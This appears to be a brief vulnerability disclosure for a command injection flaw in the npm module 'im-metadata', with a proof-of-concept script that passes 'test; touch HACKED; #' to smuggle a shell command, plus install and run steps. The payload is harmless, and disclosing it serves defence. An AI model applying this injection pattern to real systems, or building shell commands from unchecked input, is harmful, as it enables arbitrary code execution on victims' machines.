This vulnerability allows to execute arbitrary commands remotely inside the victim's PC
The issue occurs because a user input
is formatted inside a command
that will be executed without any check.
// poc.js
var metadata = require("im-metadata");
metadata("test; touch HACKED; #", {}, function () {});
HACKED
npm i im-metadata # Install affected module
node poc.js # Run the PoC
HACKED
has been created :)